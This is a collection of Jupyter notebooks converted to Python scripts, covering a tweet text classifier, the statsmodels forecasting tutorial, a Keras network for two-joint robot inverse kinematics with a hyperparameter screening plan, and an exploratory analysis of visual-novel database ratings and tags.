('bow',CountVectorizer(analyzer=text_processing)), # strings to token integer counts
('tfidf', TfidfTransformer()), # integer counts to weighted TF-IDF scores
('classifier', MultinomialNB()), # train on TF-IDF vectors w/ Naive Bayes classifier
])
pipeline.fit(msg_train,label_train)
# +
predictions = pipeline.predict(msg_test)
print(classification_report(predictions,label_test))
print ('\n')
print(confusion_matrix(predictions,label_test))
print(accuracy_score(predictions,label_test))
# -
def form_sentence(tweet):
tweet_blob = TextBlob(tweet)
return ' '.join(tweet_blob.words)
print(form_sentence(train_tweets['text'].iloc[10]))
print(train_tweets['text'].iloc[10])
# +
def no_user_alpha(tweet):
tweet_list = [ele for ele in tweet.split() if ele != 'user']
clean_tokens = [t for t in tweet_list if re.match(r'[^\W\d]*$', t)]
clean_s = ' '.join(clean_tokens)
clean_mess = [word for word in clean_s.split() if word.lower() not in stopwords.words('english')]
return clean_mess
print(no_user_alpha(form_sentence(train_tweets['text'].iloc[10])))
print(train_tweets['text'].iloc[10])
# +
def normalization(tweet_list):
lem = WordNetLemmatizer()
normalized_tweet = []
for word in tweet_list:
normalized_text = lem.lemmatize(word,'v')
normalized_tweet.append(normalized_text)
return normalized_tweet
tweet_list = 'I was playing with my friends with whom I used to play, when you called me yesterday'.split()
print(normalization(tweet_list))
# -
|
Task 2- Favour and Against tweets/notebooks/favour against tweets.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Forecasting in statsmodels
#
# This notebook describes forecasting using time series models in statsmodels.
#
# **Note**: this notebook applies only to the state space model classes, which are:
#
# - `sm.tsa.SARIMAX`
# - `sm.tsa.UnobservedComponents`
# - `sm.tsa.VARMAX`
# - `sm.tsa.DynamicFactor`
# +
# %matplotlib inline
import numpy as np
import pandas as pd
import statsmodels.api as sm
import matplotlib.pyplot as plt
macrodata = sm.datasets.macrodata.load_pandas().data
macrodata.index = pd.period_range('1959Q1', '2009Q3', freq='Q')
# -
# ## Basic example
#
# A simple example is to use an AR(1) model to forecast inflation. Before forecasting, let's take a look at the series:
endog = macrodata['infl']
endog.plot(figsize=(15, 5))
# ### Constructing and estimating the model
# The next step is to formulate the econometric model that we want to use for forecasting. In this case, we will use an AR(1) model via the `SARIMAX` class in statsmodels.
#
# After constructing the model, we need to estimate its parameters. This is done using the `fit` method. The `summary` method produces several convenient tables showing the results.
# +
# Construct the model
mod = sm.tsa.SARIMAX(endog, order=(1, 0, 0), trend='c')
# Estimate the parameters
res = mod.fit()
print(res.summary())
# -
# ### Forecasting
# Out-of-sample forecasts are produced using the `forecast` or `get_forecast` methods from the results object.
#
# The `forecast` method gives only point forecasts.
# The default is to get a one-step-ahead forecast:
print(res.forecast())
# The `get_forecast` method is more general, and also allows constructing confidence intervals.
# +
# Here we construct a more complete results object.
fcast_res1 = res.get_forecast()
# Most results are collected in the `summary_frame` attribute.
# Here we specify that we want a confidence level of 90%
print(fcast_res1.summary_frame(alpha=0.10))
# -
# The default confidence level is 95%, but this can be controlled by setting the `alpha` parameter, where the confidence level is defined as $(1 - \alpha) \times 100\%$. In the example above, we specified a confidence level of 90%, using `alpha=0.10`.
# ### Specifying the number of forecasts
#
# Both of the functions `forecast` and `get_forecast` accept a single argument indicating how many forecasting steps are desired. One option for this argument is always to provide an integer describing the number of steps ahead you want.
print(res.forecast(steps=2))
fcast_res2 = res.get_forecast(steps=2)
# Note: since we did not specify the alpha parameter, the
# confidence level is at the default, 95%
print(fcast_res2.summary_frame())
# However, **if your data included a Pandas index with a defined frequency** (see the section at the end on Indexes for more information), then you can alternatively specify the date through which you want forecasts to be produced:
print(res.forecast('2010Q2'))
fcast_res3 = res.get_forecast('2010Q2')
print(fcast_res3.summary_frame())
# ### Plotting the data, forecasts, and confidence intervals
#
# Often it is useful to plot the data, the forecasts, and the confidence intervals. There are many ways to do this, but here's one example
# +
fig, ax = plt.subplots(figsize=(15, 5))
# Plot the data (here we are subsetting it to get a better look at the forecasts)
endog.loc['1999':].plot(ax=ax)
# Construct the forecasts
fcast = res.get_forecast('2011Q4').summary_frame()
fcast['mean'].plot(ax=ax, style='k--')
ax.fill_between(fcast.index, fcast['mean_ci_lower'], fcast['mean_ci_upper'], color='k', alpha=0.1);
# -
# ### Note on what to expect from forecasts
#
# The forecast above may not look very impressive, as it is almost a straight line. This is because this is a very simple, univariate forecasting model. Nonetheless, keep in mind that these simple forecasting models can be extremely competitive.
# ## Prediction vs Forecasting
#
# The results objects also contain two methods that all for both in-sample fitted values and out-of-sample forecasting. They are `predict` and `get_prediction`. The `predict` method only returns point predictions (similar to `forecast`), while the `get_prediction` method also returns additional results (similar to `get_forecast`).
#
# In general, if your interest is out-of-sample forecasting, it is easier to stick to the `forecast` and `get_forecast` methods.
# ## Cross validation
#
# **Note**: some of the functions used in this section were first introduced in statsmodels v0.11.0.
#
# A common use case is to cross-validate forecasting methods by performing h-step-ahead forecasts recursively using the following process:
#
# 1. Fit model parameters on a training sample
# 2. Produce h-step-ahead forecasts from the end of that sample
# 3. Compare forecasts against test dataset to compute error rate
# 4. Expand the sample to include the next observation, and repeat
#
# Economists sometimes call this a pseudo-out-of-sample forecast evaluation exercise, or time-series cross-validation.
# ### Example
# We will conduct a very simple exercise of this sort using the inflation dataset above. The full dataset contains 203 observations, and for expositional purposes we'll use the first 80% as our training sample and only consider one-step-ahead forecasts.
# A single iteration of the above procedure looks like the following:
# +
# Step 1: fit model parameters w/ training sample
training_obs = int(len(endog) * 0.8)
training_endog = endog[:training_obs]
training_mod = sm.tsa.SARIMAX(
training_endog, order=(1, 0, 0), trend='c')
training_res = training_mod.fit()
# Print the estimated parameters
print(training_res.params)
# +
# Step 2: produce one-step-ahead forecasts
fcast = training_res.forecast()
# Step 3: compute root mean square forecasting error
true = endog.reindex(fcast.index)
error = true - fcast
# Print out the results
print(pd.concat([true.rename('true'),
fcast.rename('forecast'),
error.rename('error')], axis=1))
# -
# To add on another observation, we can use the `append` or `extend` results methods. Either method can produce the same forecasts, but they differ in the other results that are available:
#
# - `append` is the more complete method. It always stores results for all training observations, and it optionally allows refitting the model parameters given the new observations (note that the default is *not* to refit the parameters).
# - `extend` is a faster method that may be useful if the training sample is very large. It *only* stores results for the new observations, and it does not allow refitting the model parameters (i.e. you have to use the parameters estimated on the previous sample).
#
# If your training sample is relatively small (less than a few thousand observations, for example) or if you want to compute the best possible forecasts, then you should use the `append` method. However, if that method is infeasible (for example, because you have a very large training sample) or if you are okay with slightly suboptimal forecasts (because the parameter estimates will be slightly stale), then you can consider the `extend` method.
# A second iteration, using the `append` method and refitting the parameters, would go as follows (note again that the default for `append` does not refit the parameters, but we have overridden that with the `refit=True` argument):
# +
# Step 1: append a new observation to the sample and refit the parameters
append_res = training_res.append(endog[training_obs:training_obs + 1], refit=True)
# Print the re-estimated parameters
print(append_res.params)
# -
# Notice that these estimated parameters are slightly different than those we originally estimated. With the new results object, `append_res`, we can compute forecasts starting from one observation further than the previous call:
# +
# Step 2: produce one-step-ahead forecasts
fcast = append_res.forecast()
# Step 3: compute root mean square forecasting error
true = endog.reindex(fcast.index)
error = true - fcast
# Print out the results
print(pd.concat([true.rename('true'),
fcast.rename('forecast'),
error.rename('error')], axis=1))
# -
# Putting it altogether, we can perform the recursive forecast evaluation exercise as follows:
# +
# Setup forecasts
nforecasts = 3
forecasts = {}
# Get the number of initial training observations
nobs = len(endog)
n_init_training = int(nobs * 0.8)
# Create model for initial training sample, fit parameters
init_training_endog = endog.iloc[:n_init_training]
mod = sm.tsa.SARIMAX(training_endog, order=(1, 0, 0), trend='c')
res = mod.fit()
# Save initial forecast
forecasts[training_endog.index[-1]] = res.forecast(steps=nforecasts)
# Step through the rest of the sample
for t in range(n_init_training, nobs):
# Update the results by appending the next observation
updated_endog = endog.iloc[t:t+1]
res = res.append(updated_endog, refit=False)
# Save the new set of forecasts
forecasts[updated_endog.index[0]] = res.forecast(steps=nforecasts)
# Combine all forecasts into a dataframe
forecasts = pd.concat(forecasts, axis=1)
print(forecasts.iloc[:5, :5])
# -
# We now have a set of three forecasts made at each point in time from 1999Q2 through 2009Q3. We can construct the forecast errors by subtracting each forecast from the actual value of `endog` at that point.
# +
# Construct the forecast errors
forecast_errors = forecasts.apply(lambda column: endog - column).reindex(forecasts.index)
print(forecast_errors.iloc[:5, :5])
# -
# To evaluate our forecasts, we often want to look at a summary value like the root mean square error. Here we can compute that for each horizon by first flattening the forecast errors so that they are indexed by horizon and then computing the root mean square error fore each horizon.
# +
# Reindex the forecasts by horizon rather than by date
def flatten(column):
return column.dropna().reset_index(drop=True)
flattened = forecast_errors.apply(flatten)
flattened.index = (flattened.index + 1).rename('horizon')
print(flattened.iloc[:3, :5])
# +
# Compute the root mean square error
rmse = (flattened**2).mean(axis=1)**0.5
print(rmse)
# -
# #### Using `extend`
#
# We can check that we get similar forecasts if we instead use the `extend` method, but that they are not exactly the same as when we use `append` with the `refit=True` argument. This is because `extend` does not re-estimate the parameters given the new observation.
# +
# Setup forecasts
nforecasts = 3
forecasts = {}
# Get the number of initial training observations
nobs = len(endog)
n_init_training = int(nobs * 0.8)
# Create model for initial training sample, fit parameters
init_training_endog = endog.iloc[:n_init_training]
mod = sm.tsa.SARIMAX(training_endog, order=(1, 0, 0), trend='c')
res = mod.fit()
# Save initial forecast
forecasts[training_endog.index[-1]] = res.forecast(steps=nforecasts)
# Step through the rest of the sample
for t in range(n_init_training, nobs):
# Update the results by appending the next observation
updated_endog = endog.iloc[t:t+1]
res = res.extend(updated_endog)
# Save the new set of forecasts
forecasts[updated_endog.index[0]] = res.forecast(steps=nforecasts)
# Combine all forecasts into a dataframe
forecasts = pd.concat(forecasts, axis=1)
print(forecasts.iloc[:5, :5])
# +
# Construct the forecast errors
forecast_errors = forecasts.apply(lambda column: endog - column).reindex(forecasts.index)
print(forecast_errors.iloc[:5, :5])
# +
# Reindex the forecasts by horizon rather than by date
def flatten(column):
return column.dropna().reset_index(drop=True)
flattened = forecast_errors.apply(flatten)
flattened.index = (flattened.index + 1).rename('horizon')
print(flattened.iloc[:3, :5])
# +
# Compute the root mean square error
rmse = (flattened**2).mean(axis=1)**0.5
print(rmse)
# -
# By not re-estimating the parameters, our forecasts are slightly worse (the root mean square error is higher at each horizon). However, the process is faster, even with only 200 datapoints. Using the `%%timeit` cell magic on the cells above, we found a runtime of 570ms using `extend` versus 1.7s using `append` with `refit=True`. (Note that using `extend` is also faster than using `append` with `refit=False`).
# ## Indexes
#
# Throughout this notebook, we have been making use of Pandas date indexes with an associated frequency. As you can see, this index marks our data as at a quarterly frequency, between 1959Q1 and 2009Q3.
print(endog.index)
# In most cases, if your data has an associated data/time index with a defined frequency (like quarterly, monthly, etc.), then it is best to make sure your data is a Pandas series with the appropriate index. Here are three examples of this:
# Annual frequency, using a PeriodIndex
index = pd.period_range(start='2000', periods=4, freq='A')
endog1 = pd.Series([1, 2, 3, 4], index=index)
print(endog1.index)
# Quarterly frequency, using a DatetimeIndex
index = pd.date_range(start='2000', periods=4, freq='QS')
endog2 = pd.Series([1, 2, 3, 4], index=index)
print(endog2.index)
# Monthly frequency, using a DatetimeIndex
index = pd.date_range(start='2000', periods=4, freq='M')
endog3 = pd.Series([1, 2, 3, 4], index=index)
print(endog3.index)
# In fact, if your data has an associated date/time index, it is best to use that even if does not have a defined frequency. An example of that kind of index is as follows - notice that it has `freq=None`:
index = pd.DatetimeIndex([
'2000-01-01 10:08am', '2000-01-01 11:32am',
'2000-01-01 5:32pm', '2000-01-02 6:15am'])
endog4 = pd.Series([0.2, 0.5, -0.1, 0.1], index=index)
print(endog4.index)
# You can still pass this data to statsmodels' model classes, but you will get the following warning, that no frequency data was found:
mod = sm.tsa.SARIMAX(endog4)
res = mod.fit()
# What this means is that you cannot specify forecasting steps by dates, and the output of the `forecast` and `get_forecast` methods will not have associated dates. The reason is that without a given frequency, there is no way to determine what date each forecast should be assigned to. In the example above, there is no pattern to the date/time stamps of the index, so there is no way to determine what the next date/time should be (should it be in the morning of 2000-01-02? the afternoon? or maybe not until 2000-01-03?).
#
# For example, if we forecast one-step-ahead:
res.forecast(1)
# The index associated with the new forecast is `4`, because if the given data had an integer index, that would be the next value. A warning is given letting the user know that the index is not a date/time index.
#
# If we try to specify the steps of the forecast using a date, we will get the following exception:
#
# KeyError: 'The `end` argument could not be matched to a location related to the index of the data.'
#
# Here we'll catch the exception to prevent printing too much of
# the exception trace output in this notebook
try:
res.forecast('2000-01-03')
except KeyError as e:
print(e)
# Ultimately there is nothing wrong with using data that does not have an associated date/time frequency, or even using data that has no index at all, like a Numpy array. However, if you can use a Pandas series with an associated frequency, you'll have more options for specifying your forecasts and get back results with a more useful index.
|
v0.12.2/examples/notebooks/generated/statespace_forecasting.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/dnhshl/hyperparameter_doe/blob/main/simpleRobot.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="9boAgRMdmlVN"
# # simpleRobot
# Neuronales Netz zur Berechnung der inversen Kinematik eines (sehr einfachen) Roboters mit zwei Freiheitsgraden.
#
#
#
#
# + [markdown] id="SIzhfha3lF_f"
# ## Lade notwendige Libraries
#
# + id="7VG9_6c-mkKe" colab={"base_uri": "https://localhost:8080/"} outputId="c93aad6f-f159-4aae-d2b5-87c1cab779fb"
# !pip install keras_sequential_ascii
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow import keras
from keras import layers
from keras import optimizers
from keras_sequential_ascii import keras2ascii
from google.colab import files
import time
import csv
# + [markdown] id="mlj4ZTeR1Zgp"
# # Hyperparameter
# + id="58mIV_DGsTl1"
# NN Structure Parameter
layer1size = 100
layer2size = 100
layer3size = 100
# Training Parameter
tdatasize = 10000
myoptimizer = optimizers.Adam
learning_rate = 1E-2
batch_size = 32
epochs = 10
# + [markdown] id="tjCih-kdsqgV"
# # Daten
#
# Generiere Trainingsdaten. Das ist hier sehr einfach, da bei bekannten Winkeln `phi1` und `phi2` die `x` und `y` Position berechnet werden kann.
#
# Der Einfachheit halber (um auszuschließen, dass gleiche Positionen mit unterschiedlichen Winkelstellungen angefahren werden können) wird `phi1` auf 0 .. 90 Grad und `phi2` auf -90 .. 0 Grad eingeschränkt.
# + id="iIbpicffnf5m"
def gen_data(size):
l1 = 1 # Länge des ersten Roboterarms
l2 = 1 # Länge des zweiten Roboterarms
# phi1 im Bereich von 0 .. 90 Grad
phi1 = np.random.random_sample(size) * np.pi/2
# phi2 im Bereich von 0 .. -90 Grad
phi2 = -np.random.random_sample(size) * np.pi/2
# Kombiniere Vektoren als Matrix
dout = np.vstack((phi1, phi2)).T
# Berechne x und y
din = np.array([l1 * np.cos(dout[:,0]) + l2 * np.cos(dout.sum(axis=1)),
l1 * np.sin(dout[:,0]) + l2 * np.sin(dout.sum(axis=1))]).T
return (din, dout)
# + [markdown] id="eCJYxIrS235-"
# # Trainingsdaten
#
# + id="xW3AAIv828GV"
(din, dout) = gen_data(tdatasize)
# + [markdown] id="KcBfGA3EkHrY"
# # NN
#
# Zwei Fully Connected Layer, der erste Layer mit Aktivierungsfunktion.
#
# Als Fehlerfunktion wird der quadratische Fehler genutzt. Sie können auch [andere Loss Functions](https://keras.io/api/losses/) ausprobieren.
#
# Testen Sie auch verschiedene [Optimizer](https://keras.io/api/optimizers/) .
# + [markdown] id="wGXx8H8NsP8T"
# ## Hyperparameter
# + [markdown] id="edNkRU_JtHHG"
# ## Konstruiere NN
# + id="2aiSNRJGkbEF"
def build_and_compile_model():
model = keras.Sequential([
layers.Dense(layer1size, input_shape=[2,], activation='tanh'),
layers.Dense(layer2size, activation='tanh'),
layers.Dense(layer3size, activation='tanh'),
layers.Dense(2) ## output
])
model.compile(loss='mean_squared_error',
optimizer=myoptimizer(learning_rate=learning_rate))
return model
# + colab={"base_uri": "https://localhost:8080/"} id="4eCN_8bjuzwX" outputId="9b007b59-3186-4094-9405-1194e80c38c8"
mymodel = build_and_compile_model()
mymodel.summary()
print()
print('________________________')
print('NN Struktur in Ascii Art')
print('________________________')
print()
keras2ascii(mymodel)
# + [markdown] id="eEdRTD2RnArc"
# ## Trainiere Modell
#
# Nutze 20% der Testdaten als Validierungsdatensatz
# + colab={"base_uri": "https://localhost:8080/"} id="iKwfxq5HyCrt" outputId="08d6f04d-003f-4ef0-f5cf-b4408194f183"
history = mymodel.fit(din, dout,
batch_size=batch_size, epochs=epochs,
validation_split = 0.2)
# + colab={"base_uri": "https://localhost:8080/", "height": 279} id="-C1SzkvdA-tQ" outputId="79596018-afdb-4fdb-9552-f27400fc4580"
def plot_loss(history):
plt.plot(history.history['loss'], label='loss')
plt.plot(history.history['val_loss'], label='val_loss')
plt.xlabel('Epoch')
plt.ylabel('Error')
plt.legend()
plt.grid(True)
plot_loss(history)
# + [markdown] id="4-sNaAdYt9en"
# ## Teste trainiertes Modell
# + colab={"base_uri": "https://localhost:8080/"} id="DOrEnj_b0UhR" outputId="dbff73a1-646a-4b07-da98-f2df2b5583a4"
testdatasize = 100
(testdata_in, testdata_out) = gen_data(testdatasize)
predictions = mymodel.predict(testdata_in)
for i in range(10):
print(predictions[i], testdata_out[i])
testdataloss = mymodel.evaluate(testdata_in, testdata_out, batch_size = testdatasize, verbose=1)
print('testdataloss:', testdataloss)
# + [markdown] id="Di_LHbu5yxPL"
# ## Teste verschiedene Trajektorien
# + id="VYwdmG6VCRhV" colab={"base_uri": "https://localhost:8080/", "height": 761} outputId="d3347f62-47b6-40b5-ee80-28934336b908"
# Gerade
xtest1 = np.linspace(1.5,1.7)
ytest1 = 1/0.2*(xtest-1.5) -0.5
# Parabel
xtest2 = np.linspace(1, 1.8)
ytest2 = -0.5*xtest2*xtest2 +2
# Kreisbogen
xtest3 = np.linspace(-0.1, 0.1)
ytest3 = np.sqrt(0.1*0.1 - xtest3*xtest3)
xtest3 = xtest3 + 1.6
ytest3 = ytest3 - 0.4
def plot_trajectory(x, y):
plt.figure()
plt.plot(x,y, label='soll')
phipred = mymodel.predict(np.vstack((x, y)).T)
# Berechne x und y
xpred = l1 * np.cos(phipred[:,0]) + l2 * np.cos(phipred.sum(axis=1))
ypred = l1 * np.sin(phipred[:,0]) + l2 * np.sin(phipred.sum(axis=1))
plt.plot(xpred, ypred, label='ist')
plt.grid(True)
plt.legend()
plot_trajectory(xtest1, ytest1)
plot_trajectory(xtest2, ytest2)
plot_trajectory(xtest3, ytest3)
# + [markdown] id="wyrgpS9_7T_r"
# # DoE Definitive Screening
#
# + id="_orbUHSe7Yb8"
# NN Structure Parameter
layer1sizes = [50,100,150]
layer2sizes = [50,100,150]
layer3sizes = [50,100,150]
# Training Parameter
tdatasizes = [10000, 100000, 190000]
myoptimizer = optimizers.Adam
learning_rates = [1E-3, 1E-2, 1E-1]
batch_sizes = [10, 100, 190]
epochss = [5, 10, 15]
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="s1sckV1e8E_t" outputId="d0f422c8-e7e0-4a38-f9f9-5beaf6a2fd63"
doe_plan = [[2,0,1,0,2,2,2],
[1,1,1,1,1,1,1],
[0,1,0,2,0,2,2],
[0,0,0,1,2,0,2],
[0,2,1,2,0,0,0],
[0,0,2,2,2,1,0],
[0,0,2,0,0,2,1],
[0,2,2,0,1,0,2],
[1,2,2,2,2,2,2],
[2,2,0,0,0,1,2],
[2,1,2,0,2,0,0],
[2,0,2,2,0,0,2],
[2,0,0,2,1,2,0],
[0,2,0,0,2,2,0],
[2,2,0,2,2,0,1],
[2,2,2,1,0,2,0],
[1,0,0,0,0,0,0]]
testdatasize = 100
(tin, tout) = gen_data(testdatasize)
for i in range(len(doe_plan)):
p = doe_plan[i]
tdatasize = tdatasizes[p[0]]
batch_size = batch_sizes[p[1]]
epochs = epochss[p[2]]
layer1size = layer1sizes[p[3]]
layer2size = layer2sizes[p[4]]
layer3size = layer3sizes[p[5]]
learning_rate = learning_rates[p[6]]
(din, dout) = gen_data(tdatasize)
nnmodel = build_and_compile_model()
tic = time.time()
history = nnmodel.fit(din, dout, batch_size=batch_size, epochs=epochs, validation_split = 0.2)
toc = time.time()
time_taken = toc - tic
testdataloss = nnmodel.evaluate(testdata_in, testdata_out, batch_size = testdatasize, verbose=1)
results = np.array([tdatasize, batch_size, epochs,
layer1size, layer2size,layer3size,
learning_rate,
testdataloss, time_taken])
if i == 0:
saved_data = results
else:
saved_data = np.vstack((saved_data, results))
print('saved_data:', saved_data)
# Save results to file
df = pd.DataFrame(saved_data,
columns=['TDataSize', 'BatchSize', 'Epochs', 'Layer1Size',
'Layer2Size', 'Layer3Size', 'LearningRate',
'Loss','Time'])
df.to_csv('doe.csv')
files.download('doe.csv')
|
simpleRobot.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/PragunSaini/vnrec_notebooks/blob/master/vndb_eda.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] colab_type="text" id="-roAiCeYzv8L"
# ## Database Setup (for cloud notebook)
#
# + colab_type="code" id="UWvqf88czv8Y" colab={}
# For postgresql setup on colab
# Install postgresql server
# !sudo apt-get -y -qq update
# !sudo apt-get -y -qq install postgresql
# !sudo service postgresql start
# # Setup a new user `vndb`
# !sudo -u postgres createuser --superuser vndb
# !sudo -u postgres createdb vndb
# !sudo -u postgres psql -c "ALTER USER vndb PASSWORD '<PASSWORD>'"
# + colab_type="code" id="KKwuwGZVzv8y" colab={"base_uri": "https://localhost:8080/", "height": 86} outputId="c94adb5b-ff54-4a10-c227-2de9306deaa6"
# Download vndb database dump
# !curl -L https://dl.vndb.org/dump/vndb-db-latest.tar.zst -O
# + colab_type="code" id="YmOCXpkQzv9C" colab={}
# Extract and Load data in postgresql
# !sudo apt-get install zstd
# !tar -I zstd -xvf vndb-db-latest.tar.zst
# !PGPASSWORD=<PASSWORD> psql -U vndb -h 127.0.0.1 vndb -f import.sql
# + [markdown] id="M4a-Dze891qG" colab_type="text"
# ## Setup
# + id="3GSym9jlQtVU" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="4602f501-d441-4fa4-8eb8-1b2951dfb39d"
# SQL
import sqlalchemy
# Data Handling
import pandas as pd
import numpy as np
import dask.dataframe as dd
from scipy.sparse import csr_matrix, save_npz, load_npz
# Plotting
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('whitegrid')
from wordcloud import WordCloud
# + id="LaEAo0uIQtVs" colab_type="code" colab={}
# PostgreSQL engine
engine = sqlalchemy.create_engine(f'postgresql://vndb:vndb@localhost:5432/vndb')
# + [markdown] id="kYR39Sn2QtWB" colab_type="text"
# # Exploratory Data Analysis
# + [markdown] id="_rAFNP7kyIfj" colab_type="text"
# ## Tags Metadata
# + jupyter={"outputs_hidden": true} id="VTrpzR0dQtWE" colab_type="code" colab={}
# Read all tags given to vns with vote > 0
tags_vn = pd.read_sql('Select tags.name, tags.cat from tags INNER JOIN tags_vn ON tags.id = tags_vn.tag WHERE tags_vn.vote > 0', con=engine)
# + id="rzjx5CbpQtWW" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="6cb3618a-6248-485b-de25-90da631b25b2"
len(tags_vn.name.unique())
# + id="lGebwl4RQtWk" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 206} outputId="101d6941-840e-43b3-bc39-f8d02f382440"
tags_vn.head()
# + id="Pbb1-JKWQtWz" colab_type="code" colab={}
# -_-
# + id="NjAfapUqQtXB" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 363} outputId="55c30201-82df-4009-a270-866ec224d3f6"
# Excluding ero for some dignity
tags_vn[tags_vn['cat'] != 'ero'].sample(10)
# + id="LEhytPIPQtXP" colab_type="code" colab={}
# Converting to lowercased strings
tags_vn.name = tags_vn.name.str.lower()
# + id="mWiY3fCbQtXX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 139} outputId="262f6227-4b67-4ba9-e97b-39fe965e2bb6"
# Creating a frequency based word cloud
tag_grpd = tags_vn.groupby("name").size()
tag_grpd.sort_values(inplace=True, ascending=False)
tag_grpd.head()
# + id="VNNSK55oQtXj" colab_type="code" colab={}
def random_color_func(word=None, font_size=None, position=None, orientation=None, font_path=None, random_state=None):
return f"hsl({np.random.randint(0, 51)}, {np.random.randint(60, 101)}%, {np.random.randint(30, 70)}%)"
def make_word_cloud(word_freqs):
wc = WordCloud(width=2000, height=1500, background_color="white", color_func=random_color_func).generate_from_frequencies(word_freqs)
# wc = WordCloud(width=2000, height=1500, background_color="white", colormap="hot").generate_from_frequencies(word_freqs)
fig, ax = plt.subplots(figsize=(20, 15))
ax.imshow(wc, interpolation='bilinear')
ax.axis('off')
plt.show()
# + jupyter={"outputs_hidden": true} id="LOpZsxjKQtXx" colab_type="code" colab={}
# NSFW warning
make_word_cloud(tag_grpd)
# + id="HgjAnvSEQtX_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="7e7e01b6-fa45-49d0-b3c9-7f30fa2b7613"
# Let's look at tag categories
tags_cat = tags_vn.cat.unique()
tags_cat
# + id="Tb_FJjnqQtYK" colab_type="code" colab={}
tags_vn.cat = tags_vn.cat.map({'cont': 'content', 'tech': 'technical', 'ero': 'sexual content'})
# + id="G7ecQumpQtYV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 295} outputId="b708a62f-e701-4313-df34-4b7c7e35f8b9"
g = sns.countplot(tags_vn.cat)
g.set_title('Usage of tag categories')
plt.show()
# + [markdown] id="A6OtpazcQtYh" colab_type="text"
# ## Ratings data
# + id="TPQX43Y9QtYj" colab_type="code" colab={}
# Get the ratings data from user lists where vn is marked as finished
finished = pd.read_sql('Select uv.uid, uv.vid, uv.vote, uv.lastmod FROM ulist_vns uv INNER JOIN ulist_vns_labels uvl ON uv.uid = uvl.uid AND uv.vid = uvl.vid AND uvl.lbl = 2', con=engine)
# + id="8AXOClNSQtYy" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 206} outputId="0205ba34-e7e2-43d2-e137-e0a9bcbbefa6"
finished.sample(5)
# + id="oFyc3B8kQtY5" colab_type="code" colab={}
# Drop unrated entries
finished = finished.dropna()
# + id="848vuWSNQtZF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 173} outputId="53396ba8-f115-4873-fa22-4e0671435ae8"
finished["vote"].describe()
# + [markdown] id="JGPwWqD7zafl" colab_type="text"
# The votes vary from 10 to 100 with a high mean and median around 70, typical of rating data.
# + id="IGCXB9HwQtZS" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="c22643d6-a06d-4947-9aa5-502fd910f84f"
sns.distplot(np.round(finished["vote"]/10), bins=10)
plt.show()
# + id="OmSvLOO_QtZX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 191} outputId="08290a21-e8f0-444d-f5f0-497962471955"
def rating_stats(df):
print(f"Rating Count: {len(df)}")
print(f"User Count: {len(df.uid.unique())}")
print(f"VN Count: {len(df.vid.unique())}")
print(f"Matrix density: {len(df)/(len(df.uid.unique()) * len(df.vid.unique()))}")
user_grp = df.groupby("uid")
user_vote_cnt = user_grp.count()["vote"]
print(f"Max # of voted VN by a user: {user_vote_cnt.max()}")
print(f"Min # of voted VN by a user: {user_vote_cnt.min()}")
print(f"Average # of voted VN by a user: {user_vote_cnt.mean()}")
vn_grp = df.groupby("vid")
vn_vote_cnt = vn_grp.count()["vote"]
print(f"Max # of users voted a VN: {vn_vote_cnt.max()}")
print(f"Min # of users voted a VN: {vn_vote_cnt.min()}")
print(f"Average # of users voted a VN: {vn_vote_cnt.mean()}")
rating_stats(finished)
# + id="GlWKVyJmQtZn" colab_type="code" colab={}
# Converting votes to a scale of 1 - 10
# finished["scaled_vote"] = np.round(finished["vote"] / 10)
# + id="auHM2sbjQtZy" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="f0f7a251-ee18-4b69-9a3e-70f67710282f"
# USER RATING DISTRIBUTION
user_votes = finished.groupby("uid").mean()["vote"]
fig, ax = plt.subplots(figsize=(10, 8))
sns.distplot(user_votes, bins=10, kde=False)
ax.set_title("User Rating Distribution")
ax.set_xlabel("Rating")
ax.set_ylabel("Count")
plt.show()
# + id="ikHkQ2EoQtZ-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="ea3988e1-04ce-4abb-e05f-3949d3337ace"
fig, ax = plt.subplots(figsize=(10, 8))
sns.kdeplot(user_votes, shade=True)
ax.set_title("User Rating Distribution")
ax.set_xlabel("Rating")
ax.set_ylabel("Count")
plt.show()
# + id="sBYYkAfyQtaJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="6b7e00b2-2a86-4dc7-8a1a-821f6eec7d18"
# VN RATING DISTRIBUTION
vn_votes = finished.groupby("vid").mean()["vote"]
fig, ax = plt.subplots(figsize=(10, 8))
sns.distplot(vn_votes, kde=False)
ax.set_title("VN Rating Distribution")
ax.set_xlabel("Rating")
ax.set_ylabel("Count")
plt.show()
